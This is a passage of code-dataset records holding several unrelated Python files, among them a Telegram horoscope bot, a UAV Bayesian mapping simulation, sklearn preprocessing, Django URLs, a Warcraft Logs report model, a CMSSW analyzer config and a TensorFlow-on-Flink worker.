True)\ndef guess_message(message):\n    if message.text in sign:\n        ast_sign = message.text\n        h = getTextFromHoroscope(ast_sign)\n        this_period = sign_period(ast_sign)\n        bot.send_message(message.chat.id,\n                         \"Значит так, ты \" + ast_sign + \" (\" + this_period + \"). \" + \"Вот что говорят о тебе звезды: \" + h)\n\n\n    else:\n        if message.text == \"Нет\" or message.text == \"нет\" or message.text == \"в жопу\":\n            bot.send_message(message.chat.id,\n                             \"Что ж ты так грубо то...Да бог с тобой!
Лучше попробуй заново /start\")\n else:\n if message.text == \"спасибо\" or message.text == \"круто\" or message.text == \"класс\":\n bot.send_message(message.chat.id,\n \"Я рад, что тебе понравилось, заходи еще завтра, тебя будет ждать свеженький гороскоп:)\")\n else:\n bot.send_message(message.chat.id,\n \"Астролог Форер к вашим услугам, чтобы начать нажми /start\")\n\n\nbot.polling()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297801285","text":"#!/usr/bin/env python3\n\n\"\"\"\n File to test the hyperparameters on the DEFAULT simulation - see function parse_args for default settings.\n Reduced version of one-hot-sim.py\n Accepts the two following arrays (should be sampled from a Dirichlet):\n * Distribution over classes p(u)\n * Distribution over objects for classes p(t|u)\n Returns the total cross-entropy for:\n * Flat estimation\n * Predicted estimation\n * Hierarchical Prediction\n * Dynamic Hierarchical prediction\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n# Imports for file workings\nimport sys\nfrom argparse import ArgumentParser\nimport os.path\nimport errno\nimport h5py\n\ndef save_results(args, datadict, configs):\n \"\"\"\n Function to save the results.\n Requires: Output directory, arguments for case discriminiation\n dictionary, with the names being the keys and the values the data \n We should save:\n All results\n The filename represents the arguments of the simulation, with the tuple being splitable by:\n ParamName-Value_ParamName-Value_ etc.\n \"\"\"\n parentDir = os.path.dirname(__file__)\n outputdir = os.path.abspath(os.path.join(parentDir, 'tmp', 'results'))\n\n # Setting up the outputdirectory\n if args.transposed:\n transp = 1\n else:\n transp=0\n if args.random:\n rando = 1\n else:\n rando=0\n if args.testconfig:\n testconf = 1\n else:\n testconf=0\n \n # With this string formatting it can be split by _ and by -\n outname = \"Ptu-{}_Sim-{}_Dim-{}_Fov-{}_Acc-{}_HOver-{}_VOver-{}_Transp-{}_Rand-{}_Test-{}\".format(\n args.ptu, args.simcase, args.dim, args.fov, args.accuracy, 1-args.overlaph, 1-args.overlapv, transp, rando, testconf\n )\n outdir = os.path.abspath(os.path.join(outputdir, outname))\n try:\n os.mkdir(outdir)\n except OSError as exc:\n # if exc.errno != errno.EEXIST:\n raise\n # pass\n \n # Now write the files in that output directory\n # Use Syntax like:\n # for k,v in dictionary.items() - for all the different arrays that I have\n fname = os.path.join(outdir, outname+\".hdf5\")\n with h5py.File(fname, \"w\") as f:\n for k,v in datadict.items():\n dset=f.create_dataset(k, data=v)\n\n # Write the configs to an excel file. 
use PD.ExcelWriter here\n fname = os.path.abspath(os.path.join(outdir,\"configs\"+\".hdf5\"))\n with h5py.File(fname, \"w\") as f:\n for k,v in configs.items():\n dset = f.create_dataset(k, data=v.astype(np.float64))\n\n# Creating the map\ndef scenario1(xmax, ymax, classlist, transpose=False):\n \"\"\"\n Helper function to create the ground truth map, with the classlist indicies\n Indices:\n 0 - house\n 1 - pavement\n 2 - grass\n 3 - tree\n 4 - vehicle\n \"\"\"\n\n tree = np.asarray([0, 0, 0, 1, 0])\n vehicle = np.asarray([0, 0, 0, 0, 1])\n house = np.asarray([1, 0, 0, 0, 0])\n pavement = np.asarray([0, 1, 0, 0, 0])\n\n n = xmax\n m = ymax\n k = classlist.size\n gt = np.zeros((n,m,k))\n\n # Divide columns into 4 sections\n fourth = m//4\n\n # First: Everything is grass\n gt[...,2] = 1\n # second fourth is \"pavement\"\n gt[:,1*fourth+1:2*fourth,:] = pavement\n\n # in Fourth fourth, divide rows into 8 block\n eigth = n//8\n for i in range(eigth):\n if i%2==0:\n # Put houses into the even blocks\n r_idx = i*eigth\n gt[r_idx:r_idx+eigth,3*fourth:3*fourth+3,:] = house\n \n # In third block, put a few trees there\n x = np.asarray(range(0,n,5))\n gt[x,2*fourth+3,:] = tree\n\n # In second Block, put two vehicles there\n quat = m//4\n gt[quat:quat+3,fourth+int(0.5*fourth)-2:fourth+int(0.5*fourth),:] = vehicle\n gt[2*quat:2*quat+3,fourth+int(0.5*fourth)+1:fourth+int(0.5*fourth)+3,:] = vehicle\n\n if transpose:\n return np.swapaxes(gt,0,1)\n else:\n return gt\n\ndef scenario2(xmax, ymax, classlist, random=False, roadwidth=2, carcount=4, h_size=3, h_counts=5, testconfig=False, proportion=0.5, transpose=False):\n \"\"\"\n\n \"\"\"\n gt = np.zeros((xmax, ymax, classlist.size))\n tree = np.asarray([0, 0, 0, 1, 0])\n vehicle = np.asarray([0, 0, 0, 0, 1])\n house = np.asarray([1, 0, 0, 0, 0])\n pavement = np.asarray([0, 1, 0, 0, 0])\n grass = np.asarray([0, 0, 1, 0, 0])\n \n quatx = xmax // 4\n quaty = ymax // 4\n gt[...,:] = grass\n\n # Choose random indices from the second half. 
Roughly 50%\n if random:\n areasize = int(2*proportion*quatx*ymax)\n xidcs= np.random.randint(2*quatx,xmax,size=areasize)\n yidcs = np.random.randint(ymax,size=areasize)\n idcs = np.asarray((xidcs, yidcs)).T\n else: # Make the idcs nonrandom\n xrang = np.arange(2*quatx,xmax,2)\n yrang = np.arange(0,ymax,3)\n idcs = np.array([np.array([x,y]) for x in xrang for y in yrang])\n # yidcs = [y for y in yrang for x in xrang]\n gt[idcs[:,0], idcs[:,1], :] = tree\n \n # 2 Roads\n halfx = xmax //2\n halfy = ymax //2\n gt[:,halfx-roadwidth:halfx+roadwidth,:] = pavement\n gt[halfy-roadwidth:halfy+roadwidth,:,:] = pavement\n \n # sets of cars\n if random:\n cars = np.random.randint(1,carcount+1)\n caridx = np.random.randint(0,ymax-3,size=cars)\n caridcs = [np.arange(idx, idx+3) for idx in caridx]\n gt[halfx-roadwidth:halfx,caridcs,:] = vehicle\n\n caridx = np.random.randint(0,ymax-3,size=carcount-cars)\n caridcs = [np.arange(idx, idx+3) for idx in caridx]\n gt[caridcs,halfx:halfx+roadwidth,:] = vehicle\n else:\n caridx = np.arange(0,xmax, 12)\n caridcs = [np.arange(idx, idx+3) for idx in caridx]\n gt[halfx-roadwidth:halfx,caridcs,:] = vehicle\n gt[caridcs,halfx:halfx+roadwidth,:] = vehicle\n\n # Houses:\n # Top left indices\n tlx = halfx - roadwidth - h_size\n ty = halfy - roadwidth - h_size\n trx = halfx + roadwidth + 1\n \n if random:\n tlh_idx = np.random.randint(0, tlx-h_size, size=h_counts)\n trh_idx = np.random.randint(trx, xmax-h_size, size=h_counts)\n tly_idx = np.random.randint(0, ty-h_size, size=h_counts)\n try_idx = np.random.randint(0, ty-h_size, size=h_counts)\n y_idcs = np.concatenate((tly_idx, try_idx), axis=None)\n x_idcs = np.concatenate((tlh_idx, trh_idx), axis=None)\n h_yidcs = np.array([np.arange(y,y+h_size) for y in y_idcs])\n h_xidcs = np.array([np.arange(x, x+h_size) for x in x_idcs])\n pts = []\n h_idx = np.array([np.array([x,y]) for i, x_arr in enumerate(h_xidcs) for x in x_arr for y in h_yidcs[i]])\n\n else:\n tlh_idx = np.arange(0, tlx, (h_size+2)*2)\n trh_idx = np.arange(trx, xmax-h_size, (h_size+2)*2)\n tly_idx = np.arange(0, ty-h_size, (h_size+2)*2)\n x_idcs = np.concatenate((tlh_idx, trh_idx), axis=None)\n tlx_idcs = [np.arange(idx, idx+h_size) for idx in x_idcs]\n tly_idcs = [np.arange(idx, idx+h_size) for idx in tly_idx]\n h_idx = np.array([np.array([x, y]) for x_coord in tlx_idcs for x in x_coord for y_coord in tly_idcs for y in y_coord])\n \n # Switching around the cases\n if testconfig:\n gt[h_idx[:,0], h_idx[:,1], :] = house\n else:\n gt[h_idx[:,1],h_idx[:,0],:] = house\n \n if transpose:\n return np.swapaxes(gt,0,1)\n else:\n return gt\n return gt\n \ndef get_map_counts(map1):\n \"\"\"\n Function to return the (relative) counts of each class available in the map.\n For evaluation with priors\n Requires a 3D map, where the 3rd dimension is a vector of 0s and ones and it counts the 1s\n \"\"\"\n n_cells = map1.shape[0] * map1.shape[1]\n out = np.count_nonzero(map1, axis=(0,1)) / n_cells\n return out\n\ndef makeObs(gt, obs_probab, classlist):\n \"\"\"\n Returns an observation based on the Ground truth and the Observation probability\n \"\"\"\n\n obs = np.empty((gt.shape[0], gt.shape[1]), dtype='object')\n for i in range(gt.shape[0]):\n for j in range(gt.shape[1]):\n cl_name = gt[i,j]\n prob = obs_probab.loc[cl_name,:]\n obs[i,j] = np.random.choice(classlist, p=prob.to_numpy())\n return obs\n\ndef gensampleidx(gt, observation_probability):\n \"\"\"\n generates an index with probability proportional to the row in obs_prob\n \"\"\"\n sam = np.arange(gt.shape[2])\n samples 
= np.zeros((gt.shape[0], gt.shape[1]))\n    for i in range(gt.shape[0]):\n        for j in range(gt.shape[1]):\n            idx = np.nonzero(gt[i,j])[0]\n            p = observation_probability[idx]\n            samples[i,j] = np.random.choice(sam, p=p[0])\n    return samples.astype(np.int)\n\n# Prediction Functions\ndef pred_flat(fut_states, alpha=0.5):\n    \"\"\"\n    Function to do a flat prediction. See File \"bayes-discr-1D.py\" in folder ../tmp for details\n    \"\"\"\n\n    # find out how many cells still have a uniform prior\n    num_states = fut_states.shape[2]\n    unif_list = []\n    alr_obs_list = []\n    unif_vec = np.ones(num_states, dtype=float)/num_states\n    for i in range(fut_states.shape[0]):\n        for j in range(fut_states.shape[1]):\n            fut_state = fut_states[i,j]\n            # if the vector is uniform:\n            if np.array_equal(unif_vec, fut_state):\n                unif_list.append(tuple([i,j]))\n            else:\n                alr_obs_list.append(tuple([i,j]))\n    # unif_ct is now the amount of cells that still have a uniform prior\n    map_size = fut_states.shape[0] * fut_states.shape[1]\n    unif_ct = len(unif_list)\n    rel_unif = unif_ct/map_size\n    # if the relative amount of uniform cells is small, the weight of the prior is small\n    new_pr = np.copy(fut_states)\n    unif_list = np.asarray(unif_list)\n    alr_obs_list = np.asarray(alr_obs_list)\n    n_vec = np.zeros(num_states)\n    for o_val in alr_obs_list:\n        new_val = fut_states[o_val[0], o_val[1]]\n        n_vec += (1.0/len(alr_obs_list)) * new_val.astype(float)\n    # old_states = fut_states[alr_obs_list]\n    # new_states = fut_states[unif_list]\n    # new_pr[alr_obs_list] = fut_states[alr_obs_list]\n    for upd_wp in unif_list:\n        # Find way to update this\n        new_pr[upd_wp[0], upd_wp[1]] = (1.0-alpha) * new_pr[upd_wp[0], upd_wp[1]] + alpha*n_vec\n\n    return new_pr\n\ndef assign_prior(map1, areadist_vec, area_class_mat):\n    \"\"\"\n    function to assign a more informed prior: the class distribution implied by the assumed\n    distribution over areas, p(t) = sum_u p(u) * p(t|u)\n    \"\"\"\n    vec = areadist_vec.T @ area_class_mat\n    map1[...,:] = vec\n    return map1\n\n# Updating Functions:\ndef updateMap(x_min, x_max, y_min, y_max, posterior, lmap):\n    \"\"\"\n    Function that takes the new probabilities from the observations and updates the original map at the right indices\n    \"\"\"\n    lmap[x_min:x_max, y_min:y_max] = posterior\n\ndef updateprobab(obs, obs_probab, prior):\n    \"\"\"\n    prior: prior probabilities over the map elements\n    obs: observation made\n    obs_probab: probability of making the observations\n    Returns: posterior over the map\n    \"\"\"\n    # Prior is a 3D array\n    post = np.empty_like(prior)\n    for i in range(obs.shape[0]):\n        for j in range(obs.shape[1]):\n            pr = prior[i,j]\n            vec = obs_probab[obs[i,j]]\n            po = vec*pr\n            po = po/po.sum()\n            post[i,j] = po\n\n    return post\n\n# Path Planning Functions\ndef retrieveVisibleFields(wp, fov=1):\n    \"\"\"\n    Retrieves the indices of visible fields from the given [x, y] index of the UAV.\n    Uses the fov in each direction (2*fov cells per axis). Assumes index 0,0 to be the corner between 0,0 and 1,1!\n    \"\"\"
\n \"\"\"\n\n x_min = wp[0]-fov+1\n x_max = wp[0]+fov+1\n y_min = wp[1]-fov+1\n y_max = wp[1]+fov+1\n # x_vals = np.arange(wp[0]-fov+1, wp[0]+fov+1)\n # y_vals = np.arange(wp[1]-fov+1, wp[1]+fov+1)\n return x_min, x_max, y_min, y_max\n \ndef getflightpattern(xmax, ymax, fov=1, overlap=(0.5, 0.5)):\n overlap_x = overlap[0]\n overlap_y = overlap[1]\n stride_x = int(2*fov*overlap_x)\n stride_y = int(2*fov*overlap_y)\n iteration=1\n x = fov-1\n y = fov-1\n # print(\"X max: {}, Y max: {}, Stride_x: {}, Stride_y: {}\".format(xmax, ymax, stride_x, stride_y))\n wps = []\n while(x+fov < xmax):\n while(y+fov < ymax):\n if iteration%2==1:\n # leave the order\n y_n = y\n else:\n # invert the order\n y_n = ymax-y-fov\n wp = tuple([x, y_n])\n wps.append(wp)\n y += stride_y\n y = fov-1\n x += stride_x\n iteration+=1\n return np.asarray(wps)\n\n# Hierarchical functions\ndef getareaprior(arealist):\n \"\"\"\n Function to get a uniform prior over the areas\n \"\"\"\n return np.ones_like(arealist).astype(np.float) / arealist.size\n\ndef calchierprob(pu, ptu_df):\n \"\"\"\n Function to calculate the total probability of observing something\n \"\"\"\n x = pu @ ptu_df\n return x/x.sum()\n\ndef updatearea(ptu, pu, obs):\n p_tu = ptu.T[obs]\n pos = pu * p_tu\n pos = pos / pos.sum()\n return pos\n\ndef updatecounts(counts, samples):\n \"\"\"\n Function to update the count array\n \"\"\"\n for i in range(samples.shape[0]):\n for j in range(samples.shape[1]):\n counts[i,j,samples[i,j]] += 1\n # counts[...,samples] +=1\n return counts\n\n# Hierarchical Dynamic Prediction for the cells:\ndef dynamic_prediction(cts, ptu, prior_u, classlist):\n \"\"\"\n A function to dynamically estimate which area we are in\n Returns a new prior, which should be used for all cells where the counts are zero\n Arguments: \n The counts of observations\n The observation functions:\n p(u|t) = p(t|u) p(u)\n with p(u) being the flat prior over the areas\n \"\"\"\n\n # Step 1: find cells that have already been observed\n obs = np.sum(cts, axis=(0,1)).astype(np.int)\n # Step 2: for each of the observations, run \"updatearea()\" With the appropriate values\n post_u = prior_u\n for i in range(obs.size):\n n_obs = obs[i]\n for j in range(n_obs):\n post_u = updatearea(ptu, post_u, i)\n # Step 3: recalculate p(t|u) with the new p(u)\n class_probab = calchierprob(post_u, ptu)\n\n return class_probab\n\ndef recreate_posterior(prior, counts, obs_prob):\n \"\"\"\n Function to recreate the posterior, with the prior and the number of observations of the classes\n as well as the observation probabilities\n \"\"\"\n post = prior\n for i in range(counts.size):\n ct = counts[i].astype(np.int)\n for j in range(ct):\n vec = obs_prob[i]\n post = vec*post\n post = post / post.sum()\n return post\n\n# Evaluation\ndef cross_entropy(vec_true, vec_pred):\n \"\"\"\n cross entropy loss for a single element. 
Following the definition of:\n https://youtu.be/ErfnhcEV1O8?t=579\n \"\"\"\n return np.sum(vec_true*np.log(vec_pred)) * (-1.0)\n\ndef wrongcells(gtmap, predicted):\n \"\"\"\n Function to return the Relative percentage of wrongly predicted cells\n \"\"\"\n pred_idxmax = np.asarray(np.unravel_index(np.argmax(predicted, axis=2), predicted.shape))[2]\n gt_idxmax = np.asarray(np.unravel_index(np.argmax(gtmap, axis=2), gtmap.shape))[2]\n diff = pred_idxmax - gt_idxmax\n return np.count_nonzero(diff) / (gtmap.shape[0] * gtmap.shape[1]) \n\n# Actually running the simulation\ndef runsimulation(args, pu, ptu, obs_prob, arealist, classlist):\n\n # ================================\n #### Section 1 - Setup work\n # ================================\n\n max_map_size = args.dim\n n1 = m1 = max_map_size\n fov = args.fov\n h_overlap = 1-args.overlaph\n v_overlap = 1-args.overlapv\n overlap = (h_overlap, v_overlap)\n likelihood = args.accuracy\n simcase = args.simcase\n transposed = args.transposed\n rand = args.random\n testconfig = args.testconfig\n \n # Ground Truth map\n try:\n if simcase == 1:\n gtmap = scenario1(max_map_size, max_map_size, classlist, transpose=transposed)\n elif simcase == 2:\n gtmap = scenario2(max_map_size, max_map_size, classlist, transpose=transposed, random=rand, testconfig=testconfig)\n except OSError:\n raise OSError(\"Error in creating the simulation map\")\n\n real_distribution = get_map_counts(gtmap)\n pred_classes_hierar = pu @ ptu\n \n # ================================\n # SECTION 2: creating the reproduction maps\n # ================================\n\n # A map to store the counts\n countsmap = np.zeros_like(gtmap)\n\n # Maps that are used for predictions:\n predmap = np.ones_like(gtmap) / gtmap.shape[2]\n flatmap = np.copy(predmap)\n\n # two additional maps used for prediction \n hiermap = np.copy(predmap) # One that uses the flat prior prediction from our model\n hiermap[:,:] = np.asarray(pred_classes_hierar)\n hiermap_dyn = np.copy(hiermap) # One that updates the p(u) dynamically\n \n # Observation probabilites and waypoints\n wps = getflightpattern(n1, m1, fov=fov, overlap=overlap) # Flight pattern\n\n # ================================\n # Section 3: Running the simulation\n # ================================\n for i in range(wps.shape[0]-1):\n \n # indices that are currently visible\n x_min, x_max, y_min, y_max = retrieveVisibleFields(wps[i], fov=fov)\n gt = gtmap[x_min:x_max, y_min:y_max] # Ground Truth area\n obs = gensampleidx(gt, obs_prob) # make Observations\n\n # Getting the priors for the maps \n pr_flat = flatmap[x_min:x_max, y_min:y_max,:]\n pr_pred = predmap[x_min:x_max, y_min:y_max,:]\n # For the hierarchical function\n counts = countsmap[x_min:x_max, y_min:y_max,:]\n\n # Updating the counts\n counts = updatecounts(counts, obs)\n countsmap[x_min:x_max, y_min:y_max, :] = counts\n\n # Update the probabilities\n post_flat = updateprobab(obs, obs_prob, pr_flat)\n post_pred = updateprobab(obs, obs_prob, pr_pred)\n\n # Re-incorporate the information into the map\n flatmap[x_min:x_max, y_min:y_max] = post_flat\n predmap[x_min:x_max, y_min:y_max] = post_pred\n\n # Predict the next step\n xmin_pred, xmax_pred, ymin_pred, ymax_pred = retrieveVisibleFields(wps[i+1], fov=fov)\n fustates = predmap[xmin_pred:xmax_pred, ymin_pred:ymax_pred]\n nst_pred = pred_flat(fustates)\n # Hierarchical prediction:\n dyn_pr = hiermap_dyn[xmin_pred:xmax_pred, ymin_pred:ymax_pred, :]\n cts_fut = countsmap[xmin_pred:xmax_pred, ymin_pred:ymax_pred, :]\n pred_dyn = 
dynamic_prediction(cts_fut, ptu, pu, classlist) \n\n        # Re-incorporate prediction-values into the map \n        predmap[xmin_pred:xmax_pred, ymin_pred:ymax_pred] = nst_pred\n        # hierarchical incorporation - where nothing has been observed yet\n        zer_idcs = np.where(np.sum(cts_fut, axis=2) == 0)\n        dyn_pr[zer_idcs] = pred_dyn\n        hiermap_dyn[xmin_pred:xmax_pred, ymin_pred:ymax_pred, :] = dyn_pr\n\n    # ================================\n    ## SECTION 4: Save values\n    # ================================\n    datadict = {}\n    datadict[\"Counts\"] = countsmap\n    datadict[\"Ground Truth\"] = gtmap\n    datadict[\"Hierarchical-Dynamic\"] = hiermap_dyn\n    datadict[\"Hierarchical-Pre\"] = hiermap\n    datadict[\"Predicted\"] = predmap\n    datadict[\"Flat\"] = flatmap\n\n    configs = {}\n    configs[\"Hierarch\"] = ptu\n    configs[\"Hier_Prior\"] = pu\n    configs[\"Observation\"] = obs_prob\n    configs[\"Real_Dist\"] = real_distribution\n    configs[\"Pred_Hier\"] = pred_classes_hierar\n\n    # Safeguard if the file already exists, do not overwrite\n    try:\n        save_results(args, datadict, configs)\n    except OSError:\n        raise","sub_path":"src/runsim.py","file_name":"runsim.py","file_ext":"py","file_size_in_byte":20075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"454277062","text":"import numpy as np\nfrom sklearn import preprocessing\ndata = [\n    [2.1, -1.9, 5.5],\n    [-1.5, 2.4, 3.5],\n    [0.5, -7.9, 5.6],\n    [5.9, 2.3, -5.8]\n]\n\n# Binarize the input data\nbinarized = preprocessing.Binarizer(threshold=0.5).fit_transform(data)\nprint(\"\\nBinarized data:\\n\", binarized)\n\n#displaying the mean and the standard deviation of the input data\nprint(\"Mean =\", np.array(data).mean(axis=0))\nprint(\"Stddeviation = \", np.array(data).std(axis=0))\n\n#Removing the mean and the standard deviation of the input data\ndata_scaled = preprocessing.scale(data)\nprint(\"Mean_removed =\", data_scaled.mean(axis=0))\nprint(\"Stddeviation_removed =\", data_scaled.std(axis=0))\n\nprint(data_scaled)\n\ndata_scaler_minmax = preprocessing.MinMaxScaler(feature_range=(0,1))\ndata_scaled_minmax = data_scaler_minmax.fit_transform(data)\nprint (\"\\nMin max scaled data:\\n\", data_scaled_minmax)\n\n# Normalization\ndata_normalized_l1 = preprocessing.normalize(data, norm='l1')\nprint(\"\\nL1 normalized data:\\n\", data_normalized_l1)\n\ndata_normalized_l2 = preprocessing.normalize(data, norm='l2')\nprint(\"\\nL2 normalized data:\\n\", data_normalized_l2)","sub_path":"src/preprocessLearn.py","file_name":"preprocessLearn.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"412950520","text":"from django.conf.urls import url\n\nfrom unitime import views\n\nurlpatterns = [\n    url(r'^course/$', views.CourseListView.as_view(), name='all_courses'),\n    url(r'^course/(?P<code>[\\w-]+)/$', views.CourseView.as_view(), name='course_by_code'),\n    url(r'^event/$', views.EventView.as_view(), name='events_by_code'),\n    url(r'^alamon/event/$', views.AlamonEventView.as_view(), name='alamon_events_by_code'),\n    url(r'^event/(?P<code>[\\w-]+)/$', views.EventView.as_view(), name='events_by_code'),\n    url(r'^room/$', views.RoomView.as_view(), name='room'),\n    url(r'^codes/$', views.CourseCodeView.as_view(), name='codes'),\n]\n","sub_path":"unitime/unitime/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"175883161","text":"import inspect\n\n\ndef 
d(*args, **kwargs):\n result = {}\n result.update(kwargs)\n frame = inspect.currentframe()\n prev_locals = frame.f_back.f_locals\n values = []\n for arg in args:\n for k, v in prev_locals.items():\n if v is arg:\n idv = id(v)\n if idv in values:\n raise ValueError(f\"duplicate key for {v}\")\n result[k] = v\n values.append(idv)\n return result\n","sub_path":"d/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"636585858","text":"\n\n# IMPORT STANRD LIBRARIES\nimport datetime\n\n# IMPORT THIRD PARTY LIBRARIES\nimport mongoengine as me\n\n# IMPORT LOCAL LIBRARIES\nfrom lorgs import data\nfrom lorgs import utils\nfrom lorgs.models import warcraftlogs_base\nfrom lorgs.models.warcraftlogs_actor import Boss\nfrom lorgs.models.warcraftlogs_fight import Fight\n\n\nclass Report(me.EmbeddedDocument, warcraftlogs_base.wclclient_mixin):\n\n report_id = me.StringField(primary_key=True)\n start_time = me.IntField(default=0)\n\n title = me.StringField()\n\n fights = me.ListField(me.EmbeddedDocumentField(Fight))\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n for fight in self.fights:\n fight.report = self\n\n def __str__(self):\n return f\"\"\n\n def as_dict(self):\n return {\n \"code\": self.report_id,\n \"start_time\": self.start_time,\n \"num_fights\": len(self.fights),\n \"fights\": [fight.as_dict() for fight in self.fights]\n }\n\n ##########################\n # Attributes\n #\n @property\n def players(self):\n return utils.flatten(fight.players for fight in self.fights)\n\n @property\n def report_url(self):\n return f\"https://www.warcraftlogs.com/reports/{self.report_id}/\"\n\n ##########################\n # Methods\n #\n\n def add_fight(self, **kwargs):\n fight = Fight(**kwargs)\n fight.report = self\n self.fights.append(fight)\n return fight\n\n ##########################\n # Query\n #\n\n async def load_report_info(self, fight_ids=None):\n \"\"\"Fetch all fights in this report.\n\n Args:\n fight_ids(list[int], optional): list of fights to load.\n loads all fights, if not specified.\n\n \"\"\"\n query = f\"\"\"\n reportData\n {{\n report(code: \"{self.report_id}\")\n {{\n title\n zone {{name id}}\n startTime\n\n # masterData\n # {{\n # actors(type: \"Player\")\n # {{\n # name\n # id\n # }}\n # }}\n\n fights(fightIDs: {fight_ids or []})\n {{\n id\n encounterID\n startTime\n endTime\n fightPercentage\n # kill\n }}\n }}\n }}\n \"\"\"\n\n query_result = await self.client.query(query)\n report_data = query_result.get(\"reportData\", {}).get(\"report\", {})\n\n # Update the Report itself\n self.title = report_data.get(\"title\", \"\")\n self.start_time = report_data.get(\"startTime\", 0)\n\n # Update the Fights in this report\n for fight_data in report_data.get(\"fights\", []):\n\n # skip trash fights\n boss_id = fight_data.get(\"encounterID\")\n if not boss_id:\n continue\n\n # Get the fight\n fight = self.add_fight()\n fight.fight_id = fight_data.get(\"id\")\n fight.start_time = fight_data.get(\"startTime\", 0)\n fight.end_time = fight_data.get(\"endTime\", 0)\n fight.boss = Boss(boss_id=boss_id)\n fight.boss.fight = fight\n fight.boss.percent = fight_data.get(\"fightPercentage\")\n\n async def load(self, fight_ids=None):\n\n await self.load_report_info(fight_ids)\n await self.load_many(self.fights)\n\n\nclass UserReport(me.Document):\n \"\"\"docstring for UserReport\"\"\"\n\n report_id = me.StringField(primary_key=True)\n report = 
me.EmbeddedDocumentField(Report)\n\n created = me.DateTimeField(default=datetime.datetime.utcnow)\n meta = {\n 'indexes': [\n {'fields': ['created'], 'expireAfterSeconds': 7 * 24 * 60 * 60} # expires after 1 week\n ]\n }\n\n async def load(self, **kwargs):\n self.report = Report(report_id=self.report_id)\n await self.report.load(**kwargs)\n\n @classmethod\n def get_or_create(cls, **kwargs):\n obj = cls.objects(**kwargs).first()\n obj = obj or cls(**kwargs)\n return obj\n","sub_path":"lorgs/models/warcraftlogs_report.py","file_name":"warcraftlogs_report.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"601010388","text":"\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"analyzeRho\")\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.Geometry.GeometryExtended2026D49Reco_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n 'file:/home/veelken/Phase2HLT/CMSSW_11_1_0_pre6/src/HLTTrigger/Phase2HLTPFTaus/test/step3_RAW2DIGI_RECO.root'\n )\n)\n\n#--------------------------------------------------------------------------------\n# set input files\n##\n##import os\n##import re\n##\n##inputFilePath = '/hdfs/cms/store/user/sbhowmik/VBFHToTauTau_M125_14TeV_powheg_pythia8_correctedGridpack/PhaseIIMTDTDRAutumn18MiniAOD_20190524/190524_111901/0000/'\n##\n##inputFile_regex = r\"[a-zA-Z0-9_/:.-]*NTuple_TallinnL1PFTauProducer_[a-zA-Z0-9-_]+.root\"\n##\n# check if name of inputFile matches regular expression\n##inputFileNames = []\n##files = [ \"\".join([ \"file:\", inputFilePath, file ]) for file in os.listdir(inputFilePath) ]\n##for file in files:\n## inputFile_matcher = re.compile(inputFile_regex)\n## if inputFile_matcher.match(file):\n## inputFileNames.append(file)\n##print \"inputFileNames = %s\" % inputFileNames \n##\n##process.source.fileNames = cms.untracked.vstring(inputFileNames)\n#--------------------------------------------------------------------------------\n\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:phase2_realistic', '')\n\nprocess.analysisSequence = cms.Sequence()\n\n# CV: rho and rhoNeutral not yet separately reconstructed and stored in ROOT file,\n# which is why the same collections are used for \"rho\" and \"rhoNeutral\" inputs\n\nprocess.analyzeRho = cms.EDAnalyzer(\"RhoAnalyzer\",\n srcRho = cms.InputTag('hltKT6PFJets:rho'),\n srcRhoNeutral = cms.InputTag('hltKT6PFJets:rho'),\n dqmDirectory = cms.string(\"RhoAnalyzer\"),\n)\nprocess.analysisSequence += process.analyzeRho\n\nprocess.load(\"DQMServices.Core.DQMStore_cfi\")\n\nprocess.savePlots = cms.EDAnalyzer(\"DQMSimpleFileSaver\",\n outputFileName = cms.string('analyzeRho_signal_2020Jun03.root')\n)\n\nprocess.p = cms.Path(process.analysisSequence + process.savePlots)\n\nprocess.options = cms.untracked.PSet(\n wantSummary = 
cms.untracked.bool(True)\n)\n","sub_path":"test/analyzeRho_signal_cfg.py","file_name":"analyzeRho_signal_cfg.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"347373292","text":"from __future__ import print_function\nfrom datetime import datetime\nimport tensorflow as tf\nimport sys\nimport time\nimport json\nfrom tensorflow.python.summary.writer.writer_cache import FileWriterCache as SummaryWriterCache\nimport tensorflow_on_flink.tensorflow_on_flink_ops as tff_ops\nimport traceback\n\n\ndef log_speed(steps, start):\n duration = time.time() - start\n speed = steps / duration\n print (\"Read from queue: \" + str(steps) + \" steps, at \" + '%.2f' % speed + \" steps/second\")\n sys.stdout.flush()\n\n\ndef map_fun(context):\n print(tf.__version__)\n sys.stdout.flush()\n tf.logging.set_verbosity(tf.logging.ERROR)\n jobName = context.jobName\n index = context.index\n clusterStr = context.properties[\"cluster\"]\n delim = context.properties[\"SYS:delim\"]\n print (index, clusterStr)\n sys.stdout.flush()\n clusterJson = json.loads(clusterStr)\n cluster = tf.train.ClusterSpec(cluster=clusterJson)\n server = tf.train.Server(cluster, job_name=jobName, 